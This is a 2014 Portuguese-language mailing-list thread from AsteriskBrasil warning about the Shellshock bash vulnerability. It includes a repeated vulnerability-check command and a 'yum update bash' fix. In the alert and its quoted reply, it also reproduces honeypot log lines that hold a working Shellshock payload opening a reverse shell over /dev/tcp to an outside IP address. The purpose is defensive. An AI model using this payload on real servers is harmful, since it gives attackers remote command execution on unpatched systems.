Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Segundo boletim oficial Debian (Ubuntu) e RedHat (CentOS) não tem ainda atualização certa... e o BUG parece bem perigoso goo.gl/R4rBU0 Abs Giovanni Em 26 de setembro de 2014 19:27, lyon lisboa lyonlis...@gmail.com escreveu: ops, parece que já tem atualização! Em 26 de setembro de 2014 19:17, lyon lisboa lyonlis...@gmail.com escreveu: Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos – Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
[AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Caros amigos,
A vulnerabilidade do bash conhecida como shellshock foi descoberta
recentemente e divulgada ontem. Ela permite a execução de comandos remotos
nos servidores através dos servidores http. Os nossos honeypots já estão
detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
em atualizar os servidores e evitem fraudes.
Exemplo do que estamos detectando neste exato momento:
[26/Sep/2014:13:13:57 +] GET / HTTP/1.0 200 414 - () { :;};
/bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/ 01'
[26/Sep/2014:13:16:54 +] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404
507 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/
01'
Att,
Flavio E. Goncalves
___
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO
DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES.
Garanta a sua vaga e saiba mais em: www.workoffee.com.br
___
ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP .
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br
___
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS
para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
Construa soluções de PABX IP com produtos DigiVoice - visite
www.digivoice.com.br
___
Para remover seu email desta lista, basta enviar um email em branco para
asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
ops, parece que já tem atualização! Em 26 de setembro de 2014 19:17, lyon lisboa lyonlis...@gmail.com escreveu: Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Boa Noite Flavio
Segue uma dica pra verificar se o servidor está vulnerável:
env VAR='() { :;}; echo Bash is vulnerable!' bash -c echo Bash Test
*Dica divulgada pela DigitalOcean.
Pra resolver é só realizar update do bash: yum update bash
[image: Sua Foto] rafaels...@gmail.comRafael S. SaraivaPorto Alegre - RS
| Mobile: (51) 8174-7956
http://br.linkedin.com/pub/rafael-saraiva/52/aab/230
https://plus.google.com/u/0/+RafaelSaraivaRS
Em 26 de setembro de 2014 15:11, Flavio Goncalves fla...@voffice.com.br
escreveu:
Caros amigos,
A vulnerabilidade do bash conhecida como shellshock foi descoberta
recentemente e divulgada ontem. Ela permite a execução de comandos remotos
nos servidores através dos servidores http. Os nossos honeypots já estão
detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
em atualizar os servidores e evitem fraudes.
Exemplo do que estamos detectando neste exato momento:
[26/Sep/2014:13:13:57 +] GET / HTTP/1.0 200 414 - () { :;};
/bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/ 01'
[26/Sep/2014:13:16:54 +] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
404 507 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/
195.225.34.14/ 01'
Att,
Flavio E. Goncalves
___
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto
e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de
BRINDES.
Garanta a sua vaga e saiba mais em: www.workoffee.com.br
___
ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia
IP .
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
Banco de Canais Analógicos – Appliance Asterisk Acesse www.aligera.com.br
___
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e
FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
Construa soluções de PABX IP com produtos DigiVoice - visite
www.digivoice.com.br
___
Para remover seu email desta lista, basta enviar um email em branco para
asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
___
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO
DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES.
Garanta a sua vaga e saiba mais em: www.workoffee.com.br
___
ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP .
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br
___
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS
para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
Construa soluções de PABX IP com produtos DigiVoice - visite
www.digivoice.com.br
___
Para remover seu email desta lista, basta enviar um email em branco para
asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
